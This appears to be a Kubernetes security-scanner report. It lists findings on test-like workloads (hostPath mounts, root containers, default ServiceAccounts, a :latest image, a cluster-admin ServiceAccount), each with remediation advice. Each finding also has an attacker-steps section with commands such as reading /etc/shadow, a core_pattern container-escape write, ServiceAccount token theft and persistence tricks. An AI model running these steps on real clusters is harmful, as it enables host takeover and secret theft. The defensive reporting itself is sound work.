How an attacker abuses this
Background
ResourceDeployment

A Deployment manages a ReplicaSet which manages Pods. The dangerous attribute lives on the pod template: every replica inherits the same ServiceAccount, the same securityContext, and the same volume mounts. A risky pod template multiplies into N risky pods.

Kubernetes docs ↗
  1. Identify the mounted path via mount or cat /proc/mounts from inside the pod.
  2. Enumerate sensitive contents. For /etc: cat /etc/shadow, /etc/kubernetes/admin.conf. For /proc: echo '|/tmp/x' > /proc/sys/kernel/core_pattern then trigger a crash.
  3. If writable, drop a payload, modify a config, or symlink-swap.
  4. Confirm impact with kdigger dig mount or deepce.sh -e.
  5. Persist via the path's owning daemon (cron under /etc, systemd unit under /lib/systemd, etc.).
Remediation
Replace hostPath with a managed alternative (CSI volume, ConfigMap, Secret, projected volume, or local PV).
  1. Determine why hostPath is used: config injection, log scraping, GPU device access. Each has a Kubernetes-native replacement.
  2. If hostPath is unavoidable, narrow path: to the smallest possible directory, set type: to the strictest matching value, and add readOnly: true on the volumeMount.
  3. Pair with runAsNonRoot: true, drop ALL capabilities, and allowPrivilegeEscalation: false.
  4. Enforce via PSA baseline (denies hostPath) or a Kyverno/Gatekeeper allowlist. Validate: kubectl get deployment/generic-hostpath-app -o yaml | grep -A3 hostPath.
Evidence
Volumetmp-data
Host path/tmp/data
Node root filesystem (full host takeover)
Show raw JSON
{
  "path": "/tmp/data",
  "volume": "tmp-data"
}
MEDIUM

Container app runs as root (UID 0) in Deployment/vulnerable/root-runner

KUBE-PODSEC-ROOT-001 1 subject Score 6.0
MITRE ATT&CK: T1611T1068T1548.001

Affected subject

MEDIUM Deployment/vulnerable/root-runner Workload 6.0
Container app runs as root (UID 0) in Deployment/vulnerable/root-runner
Scope · Workload Workload Deployment/vulnerable/root-runner
Category: Privilege Escalation Resource: Deployment/vulnerable/root-runner Namespace: vulnerable

Container app in Deployment/vulnerable/root-runner runs as UID 0, either via an explicit runAsUser: 0, an explicit runAsNonRoot: false, or by relying on the image's default user (which for most public images is root). Container UID 0 is mapped to host UID 0 by default (Linux user namespaces are still off-by-default in Kubernetes), so any kernel exploit, capability misuse, or volume-write vulnerability lands with full root privileges.

Running as root erodes every layer of in-container defense. A read-only root filesystem can be remounted (mount -o remount,rw) if CAP_SYS_ADMIN is held; a kernel CVE that requires root credentials in user-space (the runC "Leaky Vessels" CVE-2024-21626 class, the cgroup-release-agent CVE-2022-0492 class) becomes trivially exploitable; and bind-mounted directories owned by host root become writable.

The Pod Security Standards Restricted profile requires runAsNonRoot: true AND a runAsUser ≥ 1.

Impact All other in-pod hardening (read-only root, capability drops, seccomp) becomes one CVE away from full host compromise; container-CVE exploit reliability rises dramatically.
How an attacker abuses this
Background
ResourceDeployment

A Deployment manages a ReplicaSet which manages Pods. The dangerous attribute lives on the pod template: every replica inherits the same ServiceAccount, the same securityContext, and the same volume mounts. A risky pod template multiplies into N risky pods.

Kubernetes docs ↗
  1. Gain code execution as root inside the container.
  2. Read all bind-mounted host files writable to root, including ConfigMaps and Secrets.
  3. Attempt a capability-bearing kernel exploit. For example, trigger CVE-2024-21626 (Leaky Vessels) by spawning a child with WORKDIR=/proc/self/fd/8 semantics.
  4. With CAP_SYS_ADMIN remount the root filesystem read-write and modify init scripts.
  5. Persist via dropped binaries in /usr/local/bin whose mounts may survive container restart.
Remediation
Run as a non-root UID (runAsUser: 10001, runAsNonRoot: true) and bake a non-root USER into the image.
  1. In the Dockerfile, add RUN groupadd -g 10001 app && useradd -u 10001 -g app -s /usr/sbin/nologin app and USER 10001. Verify the binary works (file permissions, port binding < 1024 needs NET_BIND_SERVICE).
  2. In the PodSpec, set securityContext.runAsNonRoot: true, runAsUser: 10001, runAsGroup: 10001, fsGroup: 10001.
  3. Pair with allowPrivilegeEscalation: false, capabilities.drop: [ALL], readOnlyRootFilesystem: true, seccompProfile.type: RuntimeDefault.
  4. Validate: kubectl exec <pod> -- id returns uid=10001; kubectl get deployment/root-runner -n vulnerable -o jsonpath='{.spec.template.spec.containers[*].securityContext.runAsUser}' returns 10001.
Evidence
Containerapp
Show raw JSON
{
  "container": "app"
}
MEDIUM

Workload Deployment/flat-network/api runs as the namespace default ServiceAccount

KUBE-SA-DEFAULT-001 9 subjects Score 5.4
MITRE ATT&CK: T1552.001T1078T1528

Affected subjects (9)

MEDIUM Deployment/flat-network/api Workload 5.4
Workload Deployment/flat-network/api runs as the namespace default ServiceAccount
Scope · Workload Workload Deployment/flat-network/api
Category: Privilege Escalation Resource: Deployment/flat-network/api Namespace: flat-network

Workload Deployment/flat-network/api does not specify serviceAccountName and therefore runs as the namespace's default ServiceAccount, which by default has its token auto-mounted at /var/run/secrets/kubernetes.io/serviceaccount/token.

The default SA is harmless in a fresh namespace, but it is a magnet for permission accumulation: operators, Helm charts, and ClusterRoleBindings frequently bind permissions to it (often by mistake, via subjects: [{kind: ServiceAccount, name: default, namespace: foo}]), and the only way to know if the SA is dangerous is to enumerate every binding referencing it.

The Kubernetes RBAC Good Practices guide explicitly recommends per-workload ServiceAccounts so that the blast radius of an exposed token is bounded by a single workload's needs. An attacker with RCE in this pod reads the token, then runs kubectl auth can-i --list to find every accreted permission, often elevated by drift over the namespace's lifetime.

Impact Token theft yields whatever permissions the namespace default SA has been granted (often elevated by drift); enables lateral movement to other workloads in the namespace.
How an attacker abuses this
Background
ResourceDeployment

A Deployment manages a ReplicaSet which manages Pods. The dangerous attribute lives on the pod template: every replica inherits the same ServiceAccount, the same securityContext, and the same volume mounts. A risky pod template multiplies into N risky pods.

Kubernetes docs ↗
  1. RCE in the pod.
  2. Read the SA token: cat /var/run/secrets/kubernetes.io/serviceaccount/token.
  3. Enumerate permissions: kubectl --token=$TOKEN auth can-i --list.
  4. Exploit any usable verb. Common findings: secrets/get (loot all secrets), pods/exec (shell into other pods), pods/create with privileged template (escalate to node).
  5. Persist by creating a hidden Deployment with the same compromised SA.
Remediation
Create a dedicated ServiceAccount per workload with least-privilege RBAC; disable automount on the namespace default SA.
  1. Create a ServiceAccount: kubectl -n flat-network create sa api-sa. Grant only the verbs/resources the app actually needs via a Role + RoleBinding.
  2. Reference the new SA in the PodSpec via serviceAccountName: api-sa. If the app does NOT need to talk to the API at all, also set automountServiceAccountToken: false.
  3. Disable automount on the namespace default SA: kubectl patch sa default -n flat-network -p '{"automountServiceAccountToken": false}'.
  4. Validate: kubectl get pod -n flat-network -l <selector> -o jsonpath='{.items[*].spec.serviceAccountName}' returns the new SA, not default.
Evidence
ServiceAccountdefault
Show raw JSON
{
  "service_account": "default"
}
MEDIUM Deployment/flat-network/unmatched Workload 5.4
Workload Deployment/flat-network/unmatched runs as the namespace default ServiceAccount
Scope · Workload Workload Deployment/flat-network/unmatched
Category: Privilege Escalation Resource: Deployment/flat-network/unmatched Namespace: flat-network

Workload Deployment/flat-network/unmatched does not specify serviceAccountName and therefore runs as the namespace's default ServiceAccount, which by default has its token auto-mounted at /var/run/secrets/kubernetes.io/serviceaccount/token.

The default SA is harmless in a fresh namespace, but it is a magnet for permission accumulation: operators, Helm charts, and ClusterRoleBindings frequently bind permissions to it (often by mistake, via subjects: [{kind: ServiceAccount, name: default, namespace: foo}]), and the only way to know if the SA is dangerous is to enumerate every binding referencing it.

The Kubernetes RBAC Good Practices guide explicitly recommends per-workload ServiceAccounts so that the blast radius of an exposed token is bounded by a single workload's needs. An attacker with RCE in this pod reads the token, then runs kubectl auth can-i --list to find every accreted permission, often elevated by drift over the namespace's lifetime.

Impact Token theft yields whatever permissions the namespace default SA has been granted (often elevated by drift); enables lateral movement to other workloads in the namespace.
How an attacker abuses this
Background
ResourceDeployment

A Deployment manages a ReplicaSet which manages Pods. The dangerous attribute lives on the pod template: every replica inherits the same ServiceAccount, the same securityContext, and the same volume mounts. A risky pod template multiplies into N risky pods.

Kubernetes docs ↗
  1. RCE in the pod.
  2. Read the SA token: cat /var/run/secrets/kubernetes.io/serviceaccount/token.
  3. Enumerate permissions: kubectl --token=$TOKEN auth can-i --list.
  4. Exploit any usable verb. Common findings: secrets/get (loot all secrets), pods/exec (shell into other pods), pods/create with privileged template (escalate to node).
  5. Persist by creating a hidden Deployment with the same compromised SA.
Remediation
Create a dedicated ServiceAccount per workload with least-privilege RBAC; disable automount on the namespace default SA.
  1. Create a ServiceAccount: kubectl -n flat-network create sa unmatched-sa. Grant only the verbs/resources the app actually needs via a Role + RoleBinding.
  2. Reference the new SA in the PodSpec via serviceAccountName: unmatched-sa. If the app does NOT need to talk to the API at all, also set automountServiceAccountToken: false.
  3. Disable automount on the namespace default SA: kubectl patch sa default -n flat-network -p '{"automountServiceAccountToken": false}'.
  4. Validate: kubectl get pod -n flat-network -l <selector> -o jsonpath='{.items[*].spec.serviceAccountName}' returns the new SA, not default.
Evidence
ServiceAccountdefault
Show raw JSON
{
  "service_account": "default"
}
MEDIUM Deployment/ingress-only/ingress-app Workload 5.4
Workload Deployment/ingress-only/ingress-app runs as the namespace default ServiceAccount
Scope · Workload Workload Deployment/ingress-only/ingress-app
Category: Privilege Escalation Resource: Deployment/ingress-only/ingress-app Namespace: ingress-only

Workload Deployment/ingress-only/ingress-app does not specify serviceAccountName and therefore runs as the namespace's default ServiceAccount, which by default has its token auto-mounted at /var/run/secrets/kubernetes.io/serviceaccount/token.

The default SA is harmless in a fresh namespace, but it is a magnet for permission accumulation: operators, Helm charts, and ClusterRoleBindings frequently bind permissions to it (often by mistake, via subjects: [{kind: ServiceAccount, name: default, namespace: foo}]), and the only way to know if the SA is dangerous is to enumerate every binding referencing it.

The Kubernetes RBAC Good Practices guide explicitly recommends per-workload ServiceAccounts so that the blast radius of an exposed token is bounded by a single workload's needs. An attacker with RCE in this pod reads the token, then runs kubectl auth can-i --list to find every accreted permission, often elevated by drift over the namespace's lifetime.

Impact Token theft yields whatever permissions the namespace default SA has been granted (often elevated by drift); enables lateral movement to other workloads in the namespace.
How an attacker abuses this
Background
ResourceDeployment

A Deployment manages a ReplicaSet which manages Pods. The dangerous attribute lives on the pod template: every replica inherits the same ServiceAccount, the same securityContext, and the same volume mounts. A risky pod template multiplies into N risky pods.

Kubernetes docs ↗
  1. RCE in the pod.
  2. Read the SA token: cat /var/run/secrets/kubernetes.io/serviceaccount/token.
  3. Enumerate permissions: kubectl --token=$TOKEN auth can-i --list.
  4. Exploit any usable verb. Common findings: secrets/get (loot all secrets), pods/exec (shell into other pods), pods/create with privileged template (escalate to node).
  5. Persist by creating a hidden Deployment with the same compromised SA.
Remediation
Create a dedicated ServiceAccount per workload with least-privilege RBAC; disable automount on the namespace default SA.
  1. Create a ServiceAccount: kubectl -n ingress-only create sa ingress-app-sa. Grant only the verbs/resources the app actually needs via a Role + RoleBinding.
  2. Reference the new SA in the PodSpec via serviceAccountName: ingress-app-sa. If the app does NOT need to talk to the API at all, also set automountServiceAccountToken: false.
  3. Disable automount on the namespace default SA: kubectl patch sa default -n ingress-only -p '{"automountServiceAccountToken": false}'.
  4. Validate: kubectl get pod -n ingress-only -l <selector> -o jsonpath='{.items[*].spec.serviceAccountName}' returns the new SA, not default.
Evidence
ServiceAccountdefault
Show raw JSON
{
  "service_account": "default"
}
MEDIUM Deployment/psa-suppressed/psa-priv-app Workload 5.4
Workload Deployment/psa-suppressed/psa-priv-app runs as the namespace default ServiceAccount
Scope · Workload Workload Deployment/psa-suppressed/psa-priv-app
Category: Privilege Escalation Resource: Deployment/psa-suppressed/psa-priv-app Namespace: psa-suppressed

Workload Deployment/psa-suppressed/psa-priv-app does not specify serviceAccountName and therefore runs as the namespace's default ServiceAccount, which by default has its token auto-mounted at /var/run/secrets/kubernetes.io/serviceaccount/token.

The default SA is harmless in a fresh namespace, but it is a magnet for permission accumulation: operators, Helm charts, and ClusterRoleBindings frequently bind permissions to it (often by mistake, via subjects: [{kind: ServiceAccount, name: default, namespace: foo}]), and the only way to know if the SA is dangerous is to enumerate every binding referencing it.

The Kubernetes RBAC Good Practices guide explicitly recommends per-workload ServiceAccounts so that the blast radius of an exposed token is bounded by a single workload's needs. An attacker with RCE in this pod reads the token, then runs kubectl auth can-i --list to find every accreted permission, often elevated by drift over the namespace's lifetime.

Impact Token theft yields whatever permissions the namespace default SA has been granted (often elevated by drift); enables lateral movement to other workloads in the namespace.
How an attacker abuses this
Background
ResourceDeployment

A Deployment manages a ReplicaSet which manages Pods. The dangerous attribute lives on the pod template: every replica inherits the same ServiceAccount, the same securityContext, and the same volume mounts. A risky pod template multiplies into N risky pods.

Kubernetes docs ↗
  1. RCE in the pod.
  2. Read the SA token: cat /var/run/secrets/kubernetes.io/serviceaccount/token.
  3. Enumerate permissions: kubectl --token=$TOKEN auth can-i --list.
  4. Exploit any usable verb. Common findings: secrets/get (loot all secrets), pods/exec (shell into other pods), pods/create with privileged template (escalate to node).
  5. Persist by creating a hidden Deployment with the same compromised SA.
Remediation
Create a dedicated ServiceAccount per workload with least-privilege RBAC; disable automount on the namespace default SA.
  1. Create a ServiceAccount: kubectl -n psa-suppressed create sa psa-priv-app-sa. Grant only the verbs/resources the app actually needs via a Role + RoleBinding.
  2. Reference the new SA in the PodSpec via serviceAccountName: psa-priv-app-sa. If the app does NOT need to talk to the API at all, also set automountServiceAccountToken: false.
  3. Disable automount on the namespace default SA: kubectl patch sa default -n psa-suppressed -p '{"automountServiceAccountToken": false}'.
  4. Validate: kubectl get pod -n psa-suppressed -l <selector> -o jsonpath='{.items[*].spec.serviceAccountName}' returns the new SA, not default.
Evidence
ServiceAccountdefault
Show raw JSON
{
  "service_account": "default"
}
MEDIUM Deployment/vulnerable/generic-hostpath-app Workload 5.4
Workload Deployment/vulnerable/generic-hostpath-app runs as the namespace default ServiceAccount
Scope · Workload Workload Deployment/vulnerable/generic-hostpath-app
Category: Privilege Escalation Resource: Deployment/vulnerable/generic-hostpath-app Namespace: vulnerable

Workload Deployment/vulnerable/generic-hostpath-app does not specify serviceAccountName and therefore runs as the namespace's default ServiceAccount, which by default has its token auto-mounted at /var/run/secrets/kubernetes.io/serviceaccount/token.

The default SA is harmless in a fresh namespace, but it is a magnet for permission accumulation: operators, Helm charts, and ClusterRoleBindings frequently bind permissions to it (often by mistake, via subjects: [{kind: ServiceAccount, name: default, namespace: foo}]), and the only way to know if the SA is dangerous is to enumerate every binding referencing it.

The Kubernetes RBAC Good Practices guide explicitly recommends per-workload ServiceAccounts so that the blast radius of an exposed token is bounded by a single workload's needs. An attacker with RCE in this pod reads the token, then runs kubectl auth can-i --list to find every accreted permission, often elevated by drift over the namespace's lifetime.

Impact Token theft yields whatever permissions the namespace default SA has been granted (often elevated by drift); enables lateral movement to other workloads in the namespace.
How an attacker abuses this
Background
ResourceDeployment

A Deployment manages a ReplicaSet which manages Pods. The dangerous attribute lives on the pod template: every replica inherits the same ServiceAccount, the same securityContext, and the same volume mounts. A risky pod template multiplies into N risky pods.

Kubernetes docs ↗
  1. RCE in the pod.
  2. Read the SA token: cat /var/run/secrets/kubernetes.io/serviceaccount/token.
  3. Enumerate permissions: kubectl --token=$TOKEN auth can-i --list.
  4. Exploit any usable verb. Common findings: secrets/get (loot all secrets), pods/exec (shell into other pods), pods/create with privileged template (escalate to node).
  5. Persist by creating a hidden Deployment with the same compromised SA.
Remediation
Create a dedicated ServiceAccount per workload with least-privilege RBAC; disable automount on the namespace default SA.
  1. Create a ServiceAccount: kubectl -n vulnerable create sa generic-hostpath-app-sa. Grant only the verbs/resources the app actually needs via a Role + RoleBinding.
  2. Reference the new SA in the PodSpec via serviceAccountName: generic-hostpath-app-sa. If the app does NOT need to talk to the API at all, also set automountServiceAccountToken: false.
  3. Disable automount on the namespace default SA: kubectl patch sa default -n vulnerable -p '{"automountServiceAccountToken": false}'.
  4. Validate: kubectl get pod -n vulnerable -l <selector> -o jsonpath='{.items[*].spec.serviceAccountName}' returns the new SA, not default.
Evidence
ServiceAccountdefault
Show raw JSON
{
  "service_account": "default"
}
MEDIUM Deployment/vulnerable/host-ns-app Workload 5.4
Workload Deployment/vulnerable/host-ns-app runs as the namespace default ServiceAccount
Scope · Workload Workload Deployment/vulnerable/host-ns-app
Category: Privilege Escalation Resource: Deployment/vulnerable/host-ns-app Namespace: vulnerable

Workload Deployment/vulnerable/host-ns-app does not specify serviceAccountName and therefore runs as the namespace's default ServiceAccount, which by default has its token auto-mounted at /var/run/secrets/kubernetes.io/serviceaccount/token.

The default SA is harmless in a fresh namespace, but it is a magnet for permission accumulation: operators, Helm charts, and ClusterRoleBindings frequently bind permissions to it (often by mistake, via subjects: [{kind: ServiceAccount, name: default, namespace: foo}]), and the only way to know if the SA is dangerous is to enumerate every binding referencing it.

The Kubernetes RBAC Good Practices guide explicitly recommends per-workload ServiceAccounts so that the blast radius of an exposed token is bounded by a single workload's needs. An attacker with RCE in this pod reads the token, then runs kubectl auth can-i --list to find every accreted permission, often elevated by drift over the namespace's lifetime.

Impact Token theft yields whatever permissions the namespace default SA has been granted (often elevated by drift); enables lateral movement to other workloads in the namespace.
How an attacker abuses this
Background
ResourceDeployment

A Deployment manages a ReplicaSet which manages Pods. The dangerous attribute lives on the pod template: every replica inherits the same ServiceAccount, the same securityContext, and the same volume mounts. A risky pod template multiplies into N risky pods.

Kubernetes docs ↗
  1. RCE in the pod.
  2. Read the SA token: cat /var/run/secrets/kubernetes.io/serviceaccount/token.
  3. Enumerate permissions: kubectl --token=$TOKEN auth can-i --list.
  4. Exploit any usable verb. Common findings: secrets/get (loot all secrets), pods/exec (shell into other pods), pods/create with privileged template (escalate to node).
  5. Persist by creating a hidden Deployment with the same compromised SA.
Remediation
Create a dedicated ServiceAccount per workload with least-privilege RBAC; disable automount on the namespace default SA.
  1. Create a ServiceAccount: kubectl -n vulnerable create sa host-ns-app-sa. Grant only the verbs/resources the app actually needs via a Role + RoleBinding.
  2. Reference the new SA in the PodSpec via serviceAccountName: host-ns-app-sa. If the app does NOT need to talk to the API at all, also set automountServiceAccountToken: false.
  3. Disable automount on the namespace default SA: kubectl patch sa default -n vulnerable -p '{"automountServiceAccountToken": false}'.
  4. Validate: kubectl get pod -n vulnerable -l <selector> -o jsonpath='{.items[*].spec.serviceAccountName}' returns the new SA, not default.
Evidence
ServiceAccountdefault
Show raw JSON
{
  "service_account": "default"
}
MEDIUM Deployment/vulnerable/risky-app Workload 5.4
Workload Deployment/vulnerable/risky-app runs as the namespace default ServiceAccount
Scope · Workload Workload Deployment/vulnerable/risky-app
Category: Privilege Escalation Resource: Deployment/vulnerable/risky-app Namespace: vulnerable

Workload Deployment/vulnerable/risky-app does not specify serviceAccountName and therefore runs as the namespace's default ServiceAccount, which by default has its token auto-mounted at /var/run/secrets/kubernetes.io/serviceaccount/token.

The default SA is harmless in a fresh namespace, but it is a magnet for permission accumulation: operators, Helm charts, and ClusterRoleBindings frequently bind permissions to it (often by mistake, via subjects: [{kind: ServiceAccount, name: default, namespace: foo}]), and the only way to know if the SA is dangerous is to enumerate every binding referencing it.

The Kubernetes RBAC Good Practices guide explicitly recommends per-workload ServiceAccounts so that the blast radius of an exposed token is bounded by a single workload's needs. An attacker with RCE in this pod reads the token, then runs kubectl auth can-i --list to find every accreted permission, often elevated by drift over the namespace's lifetime.

Impact Token theft yields whatever permissions the namespace default SA has been granted (often elevated by drift); enables lateral movement to other workloads in the namespace.
How an attacker abuses this
Background
ResourceDeployment

A Deployment manages a ReplicaSet which manages Pods. The dangerous attribute lives on the pod template: every replica inherits the same ServiceAccount, the same securityContext, and the same volume mounts. A risky pod template multiplies into N risky pods.

Kubernetes docs ↗
  1. RCE in the pod.
  2. Read the SA token: cat /var/run/secrets/kubernetes.io/serviceaccount/token.
  3. Enumerate permissions: kubectl --token=$TOKEN auth can-i --list.
  4. Exploit any usable verb. Common findings: secrets/get (loot all secrets), pods/exec (shell into other pods), pods/create with privileged template (escalate to node).
  5. Persist by creating a hidden Deployment with the same compromised SA.
Remediation
Create a dedicated ServiceAccount per workload with least-privilege RBAC; disable automount on the namespace default SA.
  1. Create a ServiceAccount: kubectl -n vulnerable create sa risky-app-sa. Grant only the verbs/resources the app actually needs via a Role + RoleBinding.
  2. Reference the new SA in the PodSpec via serviceAccountName: risky-app-sa. If the app does NOT need to talk to the API at all, also set automountServiceAccountToken: false.
  3. Disable automount on the namespace default SA: kubectl patch sa default -n vulnerable -p '{"automountServiceAccountToken": false}'.
  4. Validate: kubectl get pod -n vulnerable -l <selector> -o jsonpath='{.items[*].spec.serviceAccountName}' returns the new SA, not default.
Evidence
ServiceAccountdefault
Show raw JSON
{
  "service_account": "default"
}
MEDIUM Deployment/vulnerable/root-runner Workload 5.4
Workload Deployment/vulnerable/root-runner runs as the namespace default ServiceAccount
Scope · Workload Workload Deployment/vulnerable/root-runner
Category: Privilege Escalation Resource: Deployment/vulnerable/root-runner Namespace: vulnerable

Workload Deployment/vulnerable/root-runner does not specify serviceAccountName and therefore runs as the namespace's default ServiceAccount, which by default has its token auto-mounted at /var/run/secrets/kubernetes.io/serviceaccount/token.

The default SA is harmless in a fresh namespace, but it is a magnet for permission accumulation: operators, Helm charts, and ClusterRoleBindings frequently bind permissions to it (often by mistake, via subjects: [{kind: ServiceAccount, name: default, namespace: foo}]), and the only way to know if the SA is dangerous is to enumerate every binding referencing it.

The Kubernetes RBAC Good Practices guide explicitly recommends per-workload ServiceAccounts so that the blast radius of an exposed token is bounded by a single workload's needs. An attacker with RCE in this pod reads the token, then runs kubectl auth can-i --list to find every accreted permission, often elevated by drift over the namespace's lifetime.

Impact Token theft yields whatever permissions the namespace default SA has been granted (often elevated by drift); enables lateral movement to other workloads in the namespace.
How an attacker abuses this
Background
ResourceDeployment

A Deployment manages a ReplicaSet which manages Pods. The dangerous attribute lives on the pod template: every replica inherits the same ServiceAccount, the same securityContext, and the same volume mounts. A risky pod template multiplies into N risky pods.

Kubernetes docs ↗
  1. RCE in the pod.
  2. Read the SA token: cat /var/run/secrets/kubernetes.io/serviceaccount/token.
  3. Enumerate permissions: kubectl --token=$TOKEN auth can-i --list.
  4. Exploit any usable verb. Common findings: secrets/get (loot all secrets), pods/exec (shell into other pods), pods/create with privileged template (escalate to node).
  5. Persist by creating a hidden Deployment with the same compromised SA.
Remediation
Create a dedicated ServiceAccount per workload with least-privilege RBAC; disable automount on the namespace default SA.
  1. Create a ServiceAccount: kubectl -n vulnerable create sa root-runner-sa. Grant only the verbs/resources the app actually needs via a Role + RoleBinding.
  2. Reference the new SA in the PodSpec via serviceAccountName: root-runner-sa. If the app does NOT need to talk to the API at all, also set automountServiceAccountToken: false.
  3. Disable automount on the namespace default SA: kubectl patch sa default -n vulnerable -p '{"automountServiceAccountToken": false}'.
  4. Validate: kubectl get pod -n vulnerable -l <selector> -o jsonpath='{.items[*].spec.serviceAccountName}' returns the new SA, not default.
Evidence
ServiceAccountdefault
Show raw JSON
{
  "service_account": "default"
}
MEDIUM Deployment/vulnerable/socket-mounts-app Workload 5.4
Workload Deployment/vulnerable/socket-mounts-app runs as the namespace default ServiceAccount
Scope · Workload Workload Deployment/vulnerable/socket-mounts-app
Category: Privilege Escalation Resource: Deployment/vulnerable/socket-mounts-app Namespace: vulnerable

Workload Deployment/vulnerable/socket-mounts-app does not specify serviceAccountName and therefore runs as the namespace's default ServiceAccount, which by default has its token auto-mounted at /var/run/secrets/kubernetes.io/serviceaccount/token.

The default SA is harmless in a fresh namespace, but it is a magnet for permission accumulation: operators, Helm charts, and ClusterRoleBindings frequently bind permissions to it (often by mistake, via subjects: [{kind: ServiceAccount, name: default, namespace: foo}]), and the only way to know if the SA is dangerous is to enumerate every binding referencing it.

The Kubernetes RBAC Good Practices guide explicitly recommends per-workload ServiceAccounts so that the blast radius of an exposed token is bounded by a single workload's needs. An attacker with RCE in this pod reads the token, then runs kubectl auth can-i --list to find every accreted permission, often elevated by drift over the namespace's lifetime.

Impact Token theft yields whatever permissions the namespace default SA has been granted (often elevated by drift); enables lateral movement to other workloads in the namespace.
How an attacker abuses this
Background
ResourceDeployment

A Deployment manages a ReplicaSet which manages Pods. The dangerous attribute lives on the pod template: every replica inherits the same ServiceAccount, the same securityContext, and the same volume mounts. A risky pod template multiplies into N risky pods.

Kubernetes docs ↗
  1. RCE in the pod.
  2. Read the SA token: cat /var/run/secrets/kubernetes.io/serviceaccount/token.
  3. Enumerate permissions: kubectl --token=$TOKEN auth can-i --list.
  4. Exploit any usable verb. Common findings: secrets/get (loot all secrets), pods/exec (shell into other pods), pods/create with privileged template (escalate to node).
  5. Persist by creating a hidden Deployment with the same compromised SA.
Remediation
Create a dedicated ServiceAccount per workload with least-privilege RBAC; disable automount on the namespace default SA.
  1. Create a ServiceAccount: kubectl -n vulnerable create sa socket-mounts-app-sa. Grant only the verbs/resources the app actually needs via a Role + RoleBinding.
  2. Reference the new SA in the PodSpec via serviceAccountName: socket-mounts-app-sa. If the app does NOT need to talk to the API at all, also set automountServiceAccountToken: false.
  3. Disable automount on the namespace default SA: kubectl patch sa default -n vulnerable -p '{"automountServiceAccountToken": false}'.
  4. Validate: kubectl get pod -n vulnerable -l <selector> -o jsonpath='{.items[*].spec.serviceAccountName}' returns the new SA, not default.
Evidence
ServiceAccountdefault
Show raw JSON
{
  "service_account": "default"
}
LOW

Container app uses mutable image tag nginx:latest in Deployment/vulnerable/risky-app

KUBE-IMAGE-LATEST-001 1 subject Score 2.5
MITRE ATT&CK: T1525T1195.002T1554

Affected subject

LOW Deployment/vulnerable/risky-app Workload 2.5
Container app uses mutable image tag nginx:latest in Deployment/vulnerable/risky-app
Scope · Workload Workload Deployment/vulnerable/risky-app
Category: Defense Evasion Resource: Deployment/vulnerable/risky-app Namespace: vulnerable

Container app in Deployment/vulnerable/risky-app references the image nginx:latest using a mutable tag (either :latest or no tag, which Kubernetes resolves to :latest). Mutable tags break two safety properties: (1) the same manifest produces non-deterministic deployments, since the tag may resolve to different content on different days; (2) there is no cryptographic binding between the manifest and the image content actually run, so registry-side or in-flight tampering cannot be detected.

This is a defense-evasion / supply-chain hygiene finding rather than an active exploit. Image digests (@sha256:<hex>) are immutable: the digest is computed over the manifest content, so any change yields a different digest. SLSA, Sigstore Cosign, and admission controllers like Kyverno or Connaisseur are the modern controls; pinning to a digest is the prerequisite for verifying signatures.

A public package compromise (Codecov-style or PyPI-typosquat scenarios, or the 2024 ultralytics PyPI compromise) can republish image:latest with malicious code; clusters with imagePullPolicy: Always and :latest silently pick it up. Pinning to a digest turns a silent supply-chain attack into a noisy CI failure.

Impact Non-deterministic deployments and silent ingestion of upstream supply-chain compromises; disables digest-based verification and signature checking.
How an attacker abuses this
Background
ResourceDeployment

A Deployment manages a ReplicaSet which manages Pods. The dangerous attribute lives on the pod template: every replica inherits the same ServiceAccount, the same securityContext, and the same volume mounts. A risky pod template multiplies into N risky pods.

Kubernetes docs ↗
  1. Attacker compromises an upstream image (registry credential leak, typosquat, or maintainer takeover).
  2. Pushes vendor/app:latest with a malicious additional layer.
  3. Target cluster's pod restarts and imagePullPolicy: Always re-pulls the tag, getting the new digest silently.
  4. Malicious code runs under the workload's existing RBAC/secrets context.
  5. Without digest pinning or signature verification, defenders have no signal until detection-tier tools fire on the malicious behavior.
Remediation
Pin every image to an immutable digest (@sha256:...) and verify signatures at admission.
  1. Resolve the digest: crane digest <ref> or docker buildx imagetools inspect <image>:<tag>. Update manifests to image: <repo>@sha256:<digest> (you may keep the tag for documentation: image: <repo>:1.2.3@sha256:<digest>).
  2. Set imagePullPolicy: IfNotPresent (digest pinning makes Always unnecessary). For images that absolutely must float, apply a Kyverno policy that rejects :latest.
  3. Sign images at build time with Sigstore Cosign and enforce verification at admission with Connaisseur, Kyverno's verifyImages rule, or sigstore-policy-controller.
  4. Validate: kubectl get deployment/risky-app -n vulnerable -o jsonpath='{.spec.template.spec.containers[*].image}' contains @sha256:.
Evidence
Containerapp
Imagenginx:latest
:latest is mutable: the same tag can resolve to different images over time
Show raw JSON
{
  "container": "app",
  "image": "nginx:latest"
}

Service Accounts

8 findings · 4 rules · 4 critical · 3 high · 1 medium · 0 low
CRITICAL

ServiceAccount ServiceAccount/rbac-fixtures/sa-cluster-admin holds wildcard verbs on wildcard resources (cluster-admin equivalent)

KUBE-SA-PRIVILEGED-001 2 subjects Score 10.0
MITRE ATT&CK: T1078.004T1098.004T1068

Affected subjects (2)

CRITICAL ServiceAccount/rbac-fixtures/sa-cluster-admin Namespace 10.0
ServiceAccount ServiceAccount/rbac-fixtures/sa-cluster-admin holds wildcard verbs on wildcard resources (cluster-admin equivalent)
Scope · Namespace ServiceAccount rbac-fixtures/sa-cluster-admin: namespace-scoped subject; mounted by pods in rbac-fixtures
Category: Privilege Escalation Subject: ServiceAccount/rbac-fixtures/sa-cluster-admin Resource: ServiceAccount/rbac-fixtures/sa-cluster-admin

ServiceAccount ServiceAccount/rbac-fixtures/sa-cluster-admin is bound to a Role/ClusterRole that grants verbs: [*] on resources: [*] (and typically apiGroups: [*]). This is structurally indistinguishable from cluster-admin. Every API operation on every resource is authorized.

Aggregated rules:
- verbs [*] on resources [*] (from crb-cluster-admin/cluster-admin in cluster-wide)
- verbs [*] on resources [] (from crb-cluster-admin/cluster-admin in cluster-wide)

Wildcard-on-wildcard bindings are almost never the right design. They are typically the result of: (a) copy-pasting cluster-admin for an operator the team didn't have time to scope down; (b) a wildcard added "temporarily" during integration that never got rotated; (c) a third-party operator's installer that ships with */* and assumes the operator runs in a dedicated cluster. None of those reasons survive a security review, but the binding survives because there is no concrete reason to break it. CIS Kubernetes 5.1.1 / 5.1.2 explicitly call out wildcard-on-wildcard as a finding.

Workloads using this SA: no workloads currently mount this SA. Any compromise of any of those workloads (a single CVE, a poisoned container image, a leaked configuration file containing the SA token) becomes full cluster compromise immediately. There is no defense-in-depth left.

